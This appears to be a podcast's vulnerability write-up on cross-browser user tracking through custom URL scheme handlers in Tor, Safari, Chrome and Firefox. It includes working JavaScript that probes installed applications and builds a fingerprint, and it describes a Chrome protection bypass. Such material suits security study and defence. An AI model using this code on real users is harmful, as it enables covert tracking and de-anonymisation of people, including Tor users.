Cross-browser tracking vulnerability in Tor, Safari, Chrome and Firefox

We discussed this vulnerability during Episode 77 on 18 May 2021

Kind of a neat attack for tracking users across browsers, though potentially fairly loud for most users. The issue stems from the custom scheme:// handlers that applications can register: it makes it possible to determine whether an application that registers such a handler is installed, based on how the browser reacts when asked to open a URL with that custom scheme. Probing several applications this way yields a set of installed/not-installed bits that can be combined into a unique identifier, and since the handlers are registered with the operating system rather than the browser, the identifier stays the same across browsers on the same machine.

On Firefox, Safari and Tor Browser, opening the custom scheme results in either an internal error page (when no handler is registered) or an about:blank page (with a prompt asking whether to open the application). Same Origin Policy lets the opener read the about:blank page but not the error page, so the opener can tell whether the application is installed. Tor Browser in particular would hide the prompt, and popups automatically, which allowed a more silent attack using an iframe.
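To make the about:blank vs. error-page distinction concrete, here is an added example (not code from the write-up or from the researchers) of the detection logic and of folding the per-scheme results into an identifier. The scheme names are an assumed sample list, the `probeSchemes` driver only runs in a browser, and the timing value is a guess; the Chrome-specific restriction is not handled here.

```javascript
// Added example, not from the original write-up. Scheme names below are a
// constructed sample list; real trackers would probe many more.
const PROBE_SCHEMES = ["slack", "spotify", "zoommtg", "skype", "steam"];

// Classify the window a browser produced when asked to open scheme://...
// On Firefox, Safari and Tor Browser a registered handler leaves an about:blank
// document, which is same-origin with the opener and therefore readable; with no
// handler the browser shows an internal error page, which is cross-origin, so any
// attempt to read it throws a SecurityError.
function handlerIsRegistered(win) {
  try {
    return win.document.location.href === "about:blank";
  } catch (_err) {
    return false; // cross-origin error page: nothing registered for this scheme
  }
}

// Collapse per-scheme results into a stable identifier: one bit per scheme in
// list order, rendered as a zero-padded hex string so it can be combined with
// other fingerprint signals.
function fingerprintFromResults(schemes, results) {
  let bits = 0n;
  schemes.forEach((scheme, i) => {
    if (results[scheme]) bits |= 1n << BigInt(i);
  });
  return bits.toString(16).padStart(Math.ceil(schemes.length / 4), "0");
}

// Browser-only driver (assumes a window/document; never called at load time).
// Opens each scheme in a popup, waits briefly for the browser to settle on either
// about:blank or its error page, then classifies and closes the popup. Tor Browser
// suppresses both the prompt and the popup, so the same check works from an
// iframe there; the delay is an assumption, not a measured value.
function probeSchemes(schemes, delayMs = 150) {
  return new Promise((resolve) => {
    const results = {};
    let i = 0;
    const next = () => {
      if (i >= schemes.length) return resolve(results);
      const scheme = schemes[i++];
      const w = window.open(`${scheme}://probe`, "_blank", "width=1,height=1");
      setTimeout(() => {
        results[scheme] = w ? handlerIsRegistered(w) : false;
        if (w) w.close(); // close() is permitted on a cross-origin WindowProxy
        next();
      }, delayMs);
    };
    next();
  });
}

// Usage in a page: probeSchemes(PROBE_SCHEMES).then(r =>
//   console.log(fingerprintFromResults(PROBE_SCHEMES, r)));
```

The classifier is the whole attack in miniature: the opener never needs to see the handler fire, it only needs to know whether the resulting document is readable under Same Origin Policy. Popups that are blocked outright (`window.open` returning null) are treated as "not installed", which is one reason the attack is noisy and unreliable outside Tor Browser, where the popup and prompt are hidden.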

Chrome had some extra protection, since an application cannot be launched without user interaction. This could be bypassed by opening a PDF in the page first: opening a PDF disabled the restriction, after which the same probing worked.